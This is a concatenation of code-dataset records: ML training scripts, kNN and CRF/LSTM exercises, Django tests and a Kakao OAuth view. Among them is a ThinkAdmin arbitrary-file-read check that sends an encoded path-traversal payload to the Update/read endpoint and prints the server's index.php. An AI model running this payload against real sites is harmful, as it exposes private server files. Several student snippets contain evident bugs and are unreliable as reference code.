batch_x, y: batch_y})\n \n all_predictions = np.hstack((all_predictions, predictions))\n total_accuracy += (accuracy * len(batch_x))\n all_predictions = np.array(all_predictions)\n return total_accuracy / num_examples, all_predictions\n\n\nprint(\"poofsure\")\n\n# In[ ]:\n\n\nEPOCHS = 3\nBATCH_SIZE = 500\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session(config=config) as sess:\n \n sess.run(tf.global_variables_initializer())\n num_examples = len(x_train)\n \n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n np.random.shuffle(x_train64)\n np.random.shuffle(y_train)\n \n for offset in range(0, num_examples, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = x_train64[offset:end], y_train[offset:end]\n print(\"Running session\")\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y})\n \n validation_accuracy, validation_predictions = evaluate(x_test64, y_test)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n \n saver.save(sess, './lenet')\n print(\"Model saved\")", "sub_path": "coursework2/Coursework_2_quesiton_1.py", "file_name": "Coursework_2_quesiton_1.py", "file_ext": "py", "file_size_in_byte": 7309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "skimage.transform.resize", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 101, "usage_type": "attribute"}, {"api_name": "skimage.transform.resize", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 218, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 224, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 224, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 225, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 225, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 226, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 229, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 229, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 235, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 235, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 237, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 240, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 243, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 248, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 248, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 251, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 254, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 254, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.flatten", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 260, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 263, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 272, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 282, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 285, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 292, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 294, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 295, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_session", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 332, "usage_type": "attribute"}]} +{"seq_id": "479832399", "text": "points = np.array([1,1], [1,2], [1,3], [2,1], [2,2], [2,3], [3,1], [3,2], [3, 3])\r\np = np.array([2.5, 2])\r\n\r\ndef find_nearest_neighbours(p,points, k=5):\r\n\t\"\"\"Find the k Nearest Neighbours of point p and return their indices\"\"\"\r\n\tdistances = np.zeros(points.shape[0])\r\n\tfor i in range(len(distances)):\r\n\t\tdistances[i] = distance(p, points[i])\r\n\tind = np.argsort(distances)\r\n\treturn ind[:k]\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(points[:,0], points[:,1], \"ro\")\r\nplt.plot(p[0], p[1], \"bo\")\r\nplt.axis([.5, 3.5, 0.5, 3.5])\r\n\r\ndef knn_predict(p, points, outcomes, k = 5):\r\n\tind = find_nearest_neighbours(p, points, k)\r\n\treturn majority_vote(outcomes[ind])\r\n\r\noutcomes = np.array([0,0,0,0,1,1,1,1,1])\r\nknn_predict([2.5, 2.7], points, outcomes, k=2)\r\n\r\ndef generate_synth_data(n = 50):\r\n\t\"\"\"Create two sets of point from bivariate normal distributions.\"\"\"\r\n\tnp.concatenate((ss.norm(0,1).rsv((n,2)), ss.norm(1,1).rsv((n,2))), axis = 0)\r\n\toutcomes = np.concatenate((np.repeat(0, n), np.repeat(1, n)))\r\n\treturn (points, outcomes)\r\n\r\nplt.figure()\r\nplt.plot(points[:n, 0], points[:n, 1], \"ro\")\r\nplt.plot(points[n:, 0], points[n:, 1], \"bo\")\r\nplt.savefig(\"bivardata.pdf\")\r\n", "sub_path": "kNN.py", "file_name": "kNN.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "93437117", "text": "import pickle\nfrom lib.feature import *\nfrom keras.models import load_model\nfrom sklearn_crfsuite import metrics\nfrom lib.lstmlib import *\nimport numpy as np\nfrom lib.arg import lstm_crf_arg\nfrom lib.metric import pred2text\n\nparser = lstm_crf_arg()\nargs = parser.parse_args()\ntrain_path = args.train\ntest_path = args.test\nw2v_text = args.w2v\nvec = args.vec\npred_path = args.pred\n\ncrf_k = args.ck\ndeep_k = args.lk\n\n# CRF\ncrf_test = Context(test_path, k=crf_k)\nif args.cpmi == True:\n crf_test += MutualInfo(test_path, text_file=train_path)\nif args.ctdiff == True:\n crf_test += Tdiff(test_path, text_file=train_path)\nprint(args.cmod)\ncrf = pickle.load(open(args.cmod, 'rb'))\ncrf_pred = crf.predict_prob(crf_test.X)\nunion = lambda x: [ ins for chap in x for ins in chap ]\ncrf_pred = [ ele['E'] for ele in union(crf_pred) ]\nans = union(crf_test.Y)\n\n# LSTM\ndeep_test = VecContext(test_path, k=deep_k, vec_size=50, w2v_text=w2v_text)\nmodel = load_model(args.lmod)\ndeep_pred = model.predict([deep_test.X])\n\n# ensemble\navg = lambda x, y: [ (x[i]+y[i])/2 for i in range(len(x)) ]\ncrf_deep = avg(crf_pred, deep_pred)\nlabel_crf_deep = VecContext.y2lab(crf_deep)\nlabel_deep = VecContext.y2lab(deep_pred)\nlabel_crf = VecContext.y2lab(crf_pred)\n\nprint('average:')\nprint(metrics.flat_classification_report(\n ans, label_crf_deep, labels=('I', 'E'), digits=4\n))\nprint('LSTM:')\nprint(metrics.flat_classification_report(\n ans, label_deep, labels=('I', 'E'), digits=4\n))\nprint('CRF:')\nprint(metrics.flat_classification_report(\n ans, label_crf, labels=('I', 'E'), digits=4\n))\n\nif pred_path != None:\n f = open(pred_path, 'w')\n f.write(pred2text(test_path, label_crf_deep))\n", "sub_path": "CRF+LSTM的最佳整合/lstm+crf_avg_ensemble.py", "file_name": "lstm+crf_avg_ensemble.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "lib.arg.lstm_crf_arg", "line_number": 10, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics.flat_classification_report", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 47, "usage_type": "name"}, {"api_name": "sklearn_crfsuite.metrics.flat_classification_report", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 51, "usage_type": "name"}, {"api_name": "sklearn_crfsuite.metrics.flat_classification_report", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn_crfsuite.metrics", "line_number": 55, "usage_type": "name"}, {"api_name": "lib.metric.pred2text", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "200203256", "text": "from numpy import arange\nfrom theano import config\n\nfrom optimization_base import OptimizationBase\n\nfrom MISC.container import ContainerRegisterMetaClass\nfrom MISC.logger import OutputLog\n\nclass OptimizationMomentum(OptimizationBase):\n\n __metaclass__ = ContainerRegisterMetaClass\n\n def __init__(self, data_set, optimization_parameters, hyper_parameters, regularization_methods, top=50):\n super(OptimizationMomentum, self).__init__(data_set, optimization_parameters, hyper_parameters, regularization_methods, top)\n\n self.start_value = float(optimization_parameters['start_value'])\n self.end_value = float(optimization_parameters['end_value'])\n self.step = float(optimization_parameters['step'])\n\n def perform_optimization(self, training_strategy):\n\n OutputLog().write('----------------------------------------------------------')\n OutputLog().write('momentum correlations cca_correlations time\\n')\n\n hyper_parameters = self.hyper_parameters.copy()\n best_correlation = 0\n\n #Weight decay optimization\n for i in arange(self.start_value,\n self.end_value,\n self.step,\n dtype=config.floatX):\n\n hyper_parameters.momentum = i\n correlation, execution_time = self.train(training_strategy=training_strategy, hyper_parameters=hyper_parameters)\n\n if correlation > best_correlation:\n best_correlation = correlation\n self.hyper_parameters.momentum = i\n\n OutputLog().write('%f, %s, %f\\n' % (i,\n correlation,\n execution_time))\n\n OutputLog().write('----------------------------------------------------------')\n\n return True", "sub_path": "lib/Optimizations/optimization_momentum.py", "file_name": "optimization_momentum.py", "file_ext": "py", "file_size_in_byte": 1836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "optimization_base.OptimizationBase", "line_number": 9, "usage_type": "name"}, {"api_name": "MISC.container.ContainerRegisterMetaClass", "line_number": 11, "usage_type": "name"}, {"api_name": "MISC.logger.OutputLog", "line_number": 22, "usage_type": "call"}, {"api_name": "MISC.logger.OutputLog", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 29, "usage_type": "call"}, {"api_name": "theano.config.floatX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "theano.config", "line_number": 32, "usage_type": "name"}, {"api_name": "MISC.logger.OutputLog", "line_number": 41, "usage_type": "call"}, {"api_name": "MISC.logger.OutputLog", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "517906255", "text": "#!/usr/bin/env python3\n\nimport sys\nimport json\nimport base64 \nimport requests\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'\n}\n\ndef encode(num, b):\n\n \"\"\"\n 对请求的文件名进行编码\n\n :param str num: 要编码的字符\n :param int b: 编码位数\n\n :return str result,'错误原因'\n \"\"\"\n\n return ((num == 0) and \"0\") or \\\n (encode(num // b, b).lstrip(\"0\") +\n \"0123456789abcdefghijklmnopqrstuvwxyz\"[num % b])\n\ndef check(site):\n \"\"\"\n 检测是否存在漏洞\n\n :param:\n\n :return bool True or False: 是否存在漏洞\n \"\"\"\n \n try:\n file_prefix_list = ['/', 'application/admin/../../../../../../../']\n path_name_list = ['/admin.html?s=admin/api.Update/read/', '/admin.html?s=admin/api.Update/get/encode/']\n for file_prefix in file_prefix_list:\n for path_name in path_name_list:\n payload = file_prefix + '/public/index.php'\n payload = payload.encode('utf-8')\n poc = \"\"\n for i in payload:\n poc += encode(i, 36)\n link = site + path_name + poc\n try:\n req = requests.get(link, headers = headers, verify=False)\n if req.status_code == 200:\n json_data = req.json()['data']\n if json_data:\n print(\"读取文件:/public/index.php\", \"\\n\",\"文件内容:\", \"\\n\", base64.b64decode(json_data['content']).decode())\n return True \n except Exception as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\nif __name__==\"__main__\":\n check(sys.argv[1])\n", "sub_path": "Thinkadmin_Arbitrary_File_Read.py", "file_name": "Thinkadmin_Arbitrary_File_Read.py", "file_ext": "py", "file_size_in_byte": 1859, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 65, "usage_type": "attribute"}]} +{"seq_id": "590847787", "text": "import base64\nimport random\nfrom io import BytesIO\n\nimport SimpleITK\nimport pytest\nfrom PIL import Image as PILImage\nfrom django.conf import settings\nfrom knox.models import AuthToken\nfrom rest_framework import status\n\nfrom grandchallenge.subdomains.utils import reverse\nfrom tests.cases_tests.factories import (\n ImageFactoryWithImageFile,\n ImageFactoryWithImageFile16Bit,\n ImageFactoryWithImageFile2DLarge,\n ImageFactoryWithImageFile3DLarge3Slices,\n ImageFactoryWithImageFile3DLarge4Slices,\n)\nfrom tests.retina_api_tests.helpers import (\n client_force_login,\n get_user_from_str,\n)\n\n\n@pytest.mark.django_db\nclass TestBase64ThumbnailView:\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access_and_defaults(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-thumbnail\", kwargs={\"pk\": image.pk})\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n _, token = AuthToken.objects.create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Bearer {token}\"})\n response = client.get(url, **kwargs)\n assert response.status_code == expected_status\n\n @staticmethod\n def perform_thumbnail_request(client, image, max_dimension):\n image.permit_viewing_by_retina_users()\n kwargs = {\"pk\": image.id}\n if max_dimension != settings.RETINA_DEFAULT_THUMBNAIL_SIZE:\n kwargs.update({\"width\": max_dimension, \"height\": max_dimension})\n url = reverse(\"retina:api:image-thumbnail\", kwargs=kwargs)\n client, user_model = client_force_login(client, user=\"retina_user\")\n _, token = AuthToken.objects.create(user=user_model)\n token = f\"Bearer {token}\"\n response = client.get(url, HTTP_AUTHORIZATION=token)\n return response\n\n @staticmethod\n def get_b64_from_image(image, max_dimension, is_3d=False):\n image_sitk = image.get_sitk_image()\n image_nparray = SimpleITK.GetArrayFromImage(image_sitk)\n if is_3d:\n depth = image_sitk.GetDepth()\n assert depth > 0\n # Get center slice of 3D image\n image_nparray = image_nparray[depth // 2]\n\n image_pil = PILImage.fromarray(image_nparray)\n image_pil.thumbnail((max_dimension, max_dimension), PILImage.ANTIALIAS)\n buffer = BytesIO()\n image_pil.save(buffer, format=\"png\")\n image_base64_str = base64.b64encode(buffer.getvalue())\n return image_base64_str\n\n def do_test_thumbnail_creation(\n self, client, max_dimension, image, is_3d=False\n ):\n response = self.perform_thumbnail_request(client, image, max_dimension)\n\n assert response.status_code == status.HTTP_200_OK\n image_base64_str = self.get_b64_from_image(image, max_dimension, is_3d)\n\n returned_img = PILImage.open(\n BytesIO(base64.b64decode(response.json()[\"content\"]))\n )\n assert response.json()[\"content\"] == image_base64_str.decode()\n width, height = returned_img.size\n assert max(width, height) == max_dimension\n\n @pytest.mark.parametrize(\n \"is_3d,image_factory\",\n [\n (False, ImageFactoryWithImageFile2DLarge),\n (True, ImageFactoryWithImageFile3DLarge3Slices),\n (True, ImageFactoryWithImageFile3DLarge4Slices),\n ],\n )\n @pytest.mark.parametrize(\"max_dimension\", [\"default\", \"random\"])\n def test_correct_image(self, client, max_dimension, is_3d, image_factory):\n image = image_factory()\n if max_dimension == \"random\":\n max_dimension = random.randint(1, 255)\n else:\n max_dimension = settings.RETINA_DEFAULT_THUMBNAIL_SIZE\n self.do_test_thumbnail_creation(\n client, max_dimension, image, is_3d=is_3d\n )\n\n def test_16bit_image(self, client):\n image = ImageFactoryWithImageFile16Bit()\n self.do_test_thumbnail_creation(\n client,\n max_dimension=settings.RETINA_DEFAULT_THUMBNAIL_SIZE,\n image=image,\n is_3d=True,\n )\n", "sub_path": "app/tests/retina_api_tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 4471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile", "line_number": 38, "usage_type": "call"}, {"api_name": "grandchallenge.subdomains.utils.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "tests.retina_api_tests.helpers.get_user_from_str", "line_number": 41, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects.create", "line_number": 44, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "knox.models.AuthToken", "line_number": 44, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 32, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 53, "usage_type": "name"}, {"api_name": "grandchallenge.subdomains.utils.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "tests.retina_api_tests.helpers.client_force_login", "line_number": 56, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects.create", "line_number": 57, "usage_type": "call"}, {"api_name": "knox.models.AuthToken.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "knox.models.AuthToken", "line_number": 57, "usage_type": "name"}, {"api_name": "SimpleITK.GetArrayFromImage", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 74, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 84, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 87, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 87, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 88, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 88, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}, {"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 108, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 94, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile2DLarge", "line_number": 97, "usage_type": "name"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile3DLarge3Slices", "line_number": 98, "usage_type": "name"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile3DLarge4Slices", "line_number": 99, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 102, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tests.cases_tests.factories.ImageFactoryWithImageFile16Bit", "line_number": 114, "usage_type": "call"}, {"api_name": "django.conf.settings.RETINA_DEFAULT_THUMBNAIL_SIZE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 117, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "301677180", "text": "from django.shortcuts import render, get_object_or_404, redirect\nimport urllib\nfrom django.views import View\nimport allauth\n\n# Create your views here.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass KakaoLoginVIew(View):\n def get(self, request):\n kakao_access_code = request.GET.get('code', None)\n\n url = 'https://kauth.kakao.com/oauth/token'\n\n headers = {'Content_type': 'application/x-www-form-urlencoded; charset=utf-8'}\n\n body = {'grant_type' : 'authorization_code',\n 'client_id' : 'beb7c6a8d954a47c48242ba1c1dac2d4',\n 'redirect_uri' : 'http://127.0.0.1:8000/account/login/kakao/callback',\n 'code': kakao_access_code\n }\n token_kakao_response = request.post(url, headers = headers, data = body)\n\n access_token = json.loads(token_kakao_response.text).get('access_token')\n\n url = 'https://kapi.kako.com/v2/user/me'\n headers = {\n 'Authorization' : f'Bearer {access_token}',\n 'Content-type': 'applicationapplication/x-www-form-urlencoded; charset=utf-8'\n }\n\n kakao_response = requests.get(url, headers = headers)\n kakao_response = json.loads(kakao_response.text)\n kakao = Socialplatform.objects.get(platform.text)\n return HttpResponse(f'{kakao_response.text}')\n\n\n\n\n\n\n\n# def oauth(request):\n# code = request.GET['code']\n# print('code= ' + str(code))\n\n# client_id = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = 'http://127.0.0.1:8000/account/login/kakao/callback'\n# access_token_request_uri = \"https://kauth.kakao.com/oauth/token?grant_type=authorization_code&\"\n\n# access_token_request_uri += \"client_id=\" + client_id\n# access_token_request_uri += \"&redirect_uri=\" + redirect_uri\n# access_token_request_uri += \"&code=\" + code\n# print(access_token_request_uri)\n\n# access_token_request_uri_data = requests.get(access_token_request_uri)\n# json_data = access_token_request_uri_data.json()\n# access_token = json_data['access_token']\n# print(access_token)\n\n# user_profile_info_uri = \"https://kapi.kakao.com/v2/user/me?access_token=\"\n# user_profile_info_uri += str(access_token)\n# print(user_profile_info_uri)\n\n# user_profile_info_uri_data = requests.get(user_profile_info_uri)\n# user_json_data = user_profile_info_uri_data.json()\n# user_nickname = user_json_data['properties']['nickname']\n# print(user_nickname)\n\n# return redirect('index')\n\n# def kakao_login(request):\n# login_request_uri = 'https://kauth.kakao.com/oauth/authorize?'\n# client_id = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = 'http://127.0.0.1:8000/account/login/kakao/callback'\n\n# login_request_uri += 'client_id=' + client_id\n# login_request_uri += '&redirect_uri=' + redirect_uri\n# login_request_uri += '&response_type=code'\n\n# return redirect(login_request_uri)\n\n# #코드요청\n# def kakao_login(request):\n# app_rest_api_key = 'beb7c6a8d954a47c48242ba1c1dac2d4'\n# redirect_uri = \"http://127.0.0.1:8000/account/login/kakao/callback\"\n# return redirect(f\"https://kauth.kakao.com/oauth/authorize?client_id={app_rest_api_key}&redirect_uri={redirect_uri}&responsee_type=code\")\n\n# #access token 